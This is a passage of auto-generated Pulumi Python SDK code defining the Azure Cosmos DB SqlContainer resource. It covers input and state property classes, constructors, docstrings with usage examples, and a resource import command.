pulumi.set(self, "partition_key_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this SQL container. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation, otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@autoscale_settings.setter
def autoscale_settings(self, value: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]):
pulumi.set(self, "autoscale_settings", value)
@property
@pulumi.getter(name="conflictResolutionPolicy")
def conflict_resolution_policy(self) -> Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]:
"""
A `conflict_resolution_policy` block as defined below.
"""
return pulumi.get(self, "conflict_resolution_policy")
@conflict_resolution_policy.setter
def conflict_resolution_policy(self, value: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]):
pulumi.set(self, "conflict_resolution_policy", value)
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of the SQL container. If missing, items are not expired automatically. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="indexingPolicy")
def indexing_policy(self) -> Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]:
"""
An `indexing_policy` block as defined below.
"""
return pulumi.get(self, "indexing_policy")
@indexing_policy.setter
def indexing_policy(self, value: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]):
pulumi.set(self, "indexing_policy", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="partitionKeyVersion")
def partition_key_version(self) -> Optional[pulumi.Input[int]]:
"""
Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
"""
return pulumi.get(self, "partition_key_version")
@partition_key_version.setter
def partition_key_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "partition_key_version", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput of the SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation, otherwise it cannot be updated without a manual resource destroy-apply.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="uniqueKeys")
def unique_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]:
"""
One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "unique_keys")
@unique_keys.setter
def unique_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]):
pulumi.set(self, "unique_keys", value)
@pulumi.input_type
class _SqlContainerState:
def __init__(__self__, *,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']] = None,
conflict_resolution_policy: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]] = None):
"""
Input properties used for looking up and filtering SqlContainer resources.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerAutoscaleSettingsArgs'] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation, otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input['SqlContainerConflictResolutionPolicyArgs'] conflict_resolution_policy: A `conflict_resolution_policy` block as defined below.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl: The default time to live of the SQL container. If missing, items are not expired automatically. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
:param pulumi.Input['SqlContainerIndexingPolicyArgs'] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] throughput: The throughput of the SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation, otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
if account_name is not None:
pulumi.set(__self__, "account_name", account_name)
if analytical_storage_ttl is not None:
pulumi.set(__self__, "analytical_storage_ttl", analytical_storage_ttl)
if autoscale_settings is not None:
pulumi.set(__self__, "autoscale_settings", autoscale_settings)
if conflict_resolution_policy is not None:
pulumi.set(__self__, "conflict_resolution_policy", conflict_resolution_policy)
if database_name is not None:
pulumi.set(__self__, "database_name", database_name)
if default_ttl is not None:
pulumi.set(__self__, "default_ttl", default_ttl)
if indexing_policy is not None:
pulumi.set(__self__, "indexing_policy", indexing_policy)
if name is not None:
pulumi.set(__self__, "name", name)
if partition_key_path is not None:
pulumi.set(__self__, "partition_key_path", partition_key_path)
if partition_key_version is not None:
pulumi.set(__self__, "partition_key_version", partition_key_version)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if throughput is not None:
pulumi.set(__self__, "throughput", throughput)
if unique_keys is not None:
pulumi.set(__self__, "unique_keys", unique_keys)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of Analytical Storage for this SQL container. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@analytical_storage_ttl.setter
def analytical_storage_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "analytical_storage_ttl", value)
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]:
"""
An `autoscale_settings` block as defined below. This must be set upon database creation, otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@autoscale_settings.setter
def autoscale_settings(self, value: Optional[pulumi.Input['SqlContainerAutoscaleSettingsArgs']]):
pulumi.set(self, "autoscale_settings", value)
@property
@pulumi.getter(name="conflictResolutionPolicy")
def conflict_resolution_policy(self) -> Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]:
"""
A `conflict_resolution_policy` block as defined below.
"""
return pulumi.get(self, "conflict_resolution_policy")
@conflict_resolution_policy.setter
def conflict_resolution_policy(self, value: Optional[pulumi.Input['SqlContainerConflictResolutionPolicyArgs']]):
pulumi.set(self, "conflict_resolution_policy", value)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> Optional[pulumi.Input[int]]:
"""
The default time to live of the SQL container. If missing, items are not expired automatically. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "default_ttl")
@default_ttl.setter
def default_ttl(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "default_ttl", value)
@property
@pulumi.getter(name="indexingPolicy")
def indexing_policy(self) -> Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]:
"""
An `indexing_policy` block as defined below.
"""
return pulumi.get(self, "indexing_policy")
@indexing_policy.setter
def indexing_policy(self, value: Optional[pulumi.Input['SqlContainerIndexingPolicyArgs']]):
pulumi.set(self, "indexing_policy", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="partitionKeyPath")
def partition_key_path(self) -> Optional[pulumi.Input[str]]:
"""
Define a partition key. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "partition_key_path")
@partition_key_path.setter
def partition_key_path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "partition_key_path", value)
@property
@pulumi.getter(name="partitionKeyVersion")
def partition_key_version(self) -> Optional[pulumi.Input[int]]:
"""
Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
"""
return pulumi.get(self, "partition_key_version")
@partition_key_version.setter
def partition_key_version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "partition_key_version", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def throughput(self) -> Optional[pulumi.Input[int]]:
"""
The throughput of the SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation, otherwise it cannot be updated without a manual resource destroy-apply.
"""
return pulumi.get(self, "throughput")
@throughput.setter
def throughput(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "throughput", value)
@property
@pulumi.getter(name="uniqueKeys")
def unique_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]:
"""
One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "unique_keys")
@unique_keys.setter
def unique_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SqlContainerUniqueKeyArgs']]]]):
pulumi.set(self, "unique_keys", value)
class SqlContainer(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']]] = None,
conflict_resolution_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]]] = None,
__props__=None):
"""
Manages a SQL Container within a Cosmos DB Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example = azure.cosmosdb.SqlContainer("example",
resource_group_name=azurerm_cosmosdb_account["example"]["resource_group_name"],
account_name=azurerm_cosmosdb_account["example"]["name"],
database_name=azurerm_cosmosdb_sql_database["example"]["name"],
partition_key_path="/definition/id",
partition_key_version=1,
throughput=400,
indexing_policy=azure.cosmosdb.SqlContainerIndexingPolicyArgs(
indexing_mode="Consistent",
included_paths=[
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/*",
),
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/included/?",
),
],
excluded_paths=[azure.cosmosdb.SqlContainerIndexingPolicyExcludedPathArgs(
path="/excluded/?",
)],
),
unique_keys=[azure.cosmosdb.SqlContainerUniqueKeyArgs(
paths=[
"/definition/idlong",
"/definition/idshort",
],
)])
```
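To use autoscale throughput instead of fixed throughput, an `autoscale_settings` block can be supplied in place of `throughput`. The sketch below is illustrative only: the account and database references are the same placeholders used above, and the `max_throughput` value is an arbitrary example. Note that `partition_key_path` is required when `autoscale_settings` is set, and `throughput` must be omitted.
```python
import pulumi
import pulumi_azure as azure

# Sketch: autoscale container. References below are placeholders from the example above.
autoscale_container = azure.cosmosdb.SqlContainer("autoscaleContainer",
    resource_group_name=azurerm_cosmosdb_account["example"]["resource_group_name"],
    account_name=azurerm_cosmosdb_account["example"]["name"],
    database_name=azurerm_cosmosdb_sql_database["example"]["name"],
    partition_key_path="/definition/id",  # required when autoscale_settings is set
    autoscale_settings=azure.cosmosdb.SqlContainerAutoscaleSettingsArgs(
        max_throughput=4000,  # autoscale maximum RU/s; do not also set `throughput`
    ))
```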
## Import
Cosmos SQL Containers can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/sqlContainer:SqlContainer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/sqlDatabases/database1/containers/container1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation, otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']] conflict_resolution_policy: A `conflict_resolution_policy` block as defined below.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl: The default time to live of the SQL container. If missing, items are not expired automatically. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] throughput: The throughput of the SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation, otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SqlContainerArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a SQL Container within a Cosmos DB Account.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example = azure.cosmosdb.SqlContainer("example",
resource_group_name=azurerm_cosmosdb_account["example"]["resource_group_name"],
account_name=azurerm_cosmosdb_account["example"]["name"],
database_name=azurerm_cosmosdb_sql_database["example"]["name"],
partition_key_path="/definition/id",
partition_key_version=1,
throughput=400,
indexing_policy=azure.cosmosdb.SqlContainerIndexingPolicyArgs(
indexing_mode="Consistent",
included_paths=[
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/*",
),
azure.cosmosdb.SqlContainerIndexingPolicyIncludedPathArgs(
path="/included/?",
),
],
excluded_paths=[azure.cosmosdb.SqlContainerIndexingPolicyExcludedPathArgs(
path="/excluded/?",
)],
),
unique_keys=[azure.cosmosdb.SqlContainerUniqueKeyArgs(
paths=[
"/definition/idlong",
"/definition/idshort",
],
)])
```
## Import
Cosmos SQL Containers can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:cosmosdb/sqlContainer:SqlContainer example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DocumentDB/databaseAccounts/account1/sqlDatabases/database1/containers/container1
```
:param str resource_name: The name of the resource.
:param SqlContainerArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SqlContainerArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']]] = None,
conflict_resolution_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SqlContainerArgs.__new__(SqlContainerArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
__props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
__props__.__dict__["autoscale_settings"] = autoscale_settings
__props__.__dict__["conflict_resolution_policy"] = conflict_resolution_policy
if database_name is None and not opts.urn:
raise TypeError("Missing required property 'database_name'")
__props__.__dict__["database_name"] = database_name
__props__.__dict__["default_ttl"] = default_ttl
__props__.__dict__["indexing_policy"] = indexing_policy
__props__.__dict__["name"] = name
if partition_key_path is None and not opts.urn:
raise TypeError("Missing required property 'partition_key_path'")
__props__.__dict__["partition_key_path"] = partition_key_path
__props__.__dict__["partition_key_version"] = partition_key_version
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["throughput"] = throughput
__props__.__dict__["unique_keys"] = unique_keys
super(SqlContainer, __self__).__init__(
'azure:cosmosdb/sqlContainer:SqlContainer',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
analytical_storage_ttl: Optional[pulumi.Input[int]] = None,
autoscale_settings: Optional[pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']]] = None,
conflict_resolution_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']]] = None,
database_name: Optional[pulumi.Input[str]] = None,
default_ttl: Optional[pulumi.Input[int]] = None,
indexing_policy: Optional[pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']]] = None,
name: Optional[pulumi.Input[str]] = None,
partition_key_path: Optional[pulumi.Input[str]] = None,
partition_key_version: Optional[pulumi.Input[int]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
throughput: Optional[pulumi.Input[int]] = None,
unique_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]]] = None) -> 'SqlContainer':
"""
Get an existing SqlContainer resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] analytical_storage_ttl: The default time to live of Analytical Storage for this SQL container. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerAutoscaleSettingsArgs']] autoscale_settings: An `autoscale_settings` block as defined below. This must be set upon database creation, otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
:param pulumi.Input[pulumi.InputType['SqlContainerConflictResolutionPolicyArgs']] conflict_resolution_policy: A `conflict_resolution_policy` block as defined below.
:param pulumi.Input[str] database_name: The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
:param pulumi.Input[int] default_ttl: The default time to live of the SQL container. If missing, items are not expired automatically. If present and set to `-1`, it is equal to infinity and items don’t expire by default. If present and set to some number `n`, items will expire `n` seconds after their last modified time.
:param pulumi.Input[pulumi.InputType['SqlContainerIndexingPolicyArgs']] indexing_policy: An `indexing_policy` block as defined below.
:param pulumi.Input[str] name: Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
:param pulumi.Input[str] partition_key_path: Define a partition key. Changing this forces a new resource to be created.
:param pulumi.Input[int] partition_key_version: Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
:param pulumi.Input[int] throughput: The throughput of the SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation, otherwise it cannot be updated without a manual resource destroy-apply.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SqlContainerUniqueKeyArgs']]]] unique_keys: One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SqlContainerState.__new__(_SqlContainerState)
__props__.__dict__["account_name"] = account_name
__props__.__dict__["analytical_storage_ttl"] = analytical_storage_ttl
__props__.__dict__["autoscale_settings"] = autoscale_settings
__props__.__dict__["conflict_resolution_policy"] = conflict_resolution_policy
__props__.__dict__["database_name"] = database_name
__props__.__dict__["default_ttl"] = default_ttl
__props__.__dict__["indexing_policy"] = indexing_policy
__props__.__dict__["name"] = name
__props__.__dict__["partition_key_path"] = partition_key_path
__props__.__dict__["partition_key_version"] = partition_key_version
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["throughput"] = throughput
__props__.__dict__["unique_keys"] = unique_keys
return SqlContainer(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB Account to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "account_name")
@property
@pulumi.getter(name="analyticalStorageTtl")
def analytical_storage_ttl(self) -> pulumi.Output[Optional[int]]:
"""
The default time to live of Analytical Storage for this SQL container. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n`, items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "analytical_storage_ttl")
@property
@pulumi.getter(name="autoscaleSettings")
def autoscale_settings(self) -> pulumi.Output[Optional['outputs.SqlContainerAutoscaleSettings']]:
"""
An `autoscale_settings` block as defined below. This must be set upon container creation, otherwise it cannot be updated without a manual destroy-apply. Requires `partition_key_path` to be set.
"""
return pulumi.get(self, "autoscale_settings")
@property
@pulumi.getter(name="conflictResolutionPolicy")
def conflict_resolution_policy(self) -> pulumi.Output['outputs.SqlContainerConflictResolutionPolicy']:
"""
A `conflict_resolution_policy` block as defined below.
"""
return pulumi.get(self, "conflict_resolution_policy")
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Output[str]:
"""
The name of the Cosmos DB SQL Database to create the container within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@property
@pulumi.getter(name="defaultTtl")
def default_ttl(self) -> pulumi.Output[int]:
"""
The default time to live of the SQL container. If missing, items are not expired automatically. If present and the value is set to `-1`, it is equal to infinity, and items don’t expire by default. If present and the value is set to some number `n`, items will expire `n` seconds after their last modified time.
"""
return pulumi.get(self, "default_ttl")
@property
@pulumi.getter(name="indexingPolicy")
def indexing_policy(self) -> pulumi.Output['outputs.SqlContainerIndexingPolicy']:
"""
An `indexing_policy` block as defined below.
"""
return pulumi.get(self, "indexing_policy")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Cosmos DB SQL Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="partitionKeyPath")
def partition_key_path(self) -> pulumi.Output[str]:
"""
Define a partition key. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "partition_key_path")
@property
@pulumi.getter(name="partitionKeyVersion")
def partition_key_version(self) -> pulumi.Output[Optional[int]]:
"""
Define a partition key version. Changing this forces a new resource to be created. Possible values are `1` and `2`. This should be set to `2` in order to use large partition keys.
"""
return pulumi.get(self, "partition_key_version")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Cosmos DB SQL Container is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def throughput(self) -> pulumi.Output[int]:
"""
The throughput of the SQL container (RU/s). Must be set in increments of `100`. The minimum value is `400`. This must be set upon container creation, otherwise it cannot be updated without a manual resource destroy-apply.
"""
return pulumi.get(self, "throughput")
@property
@pulumi.getter(name="uniqueKeys")
def unique_keys(self) -> pulumi.Output[Optional[Sequence['outputs.SqlContainerUniqueKey']]]:
"""
One or more `unique_key` blocks as defined below. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "unique_keys")
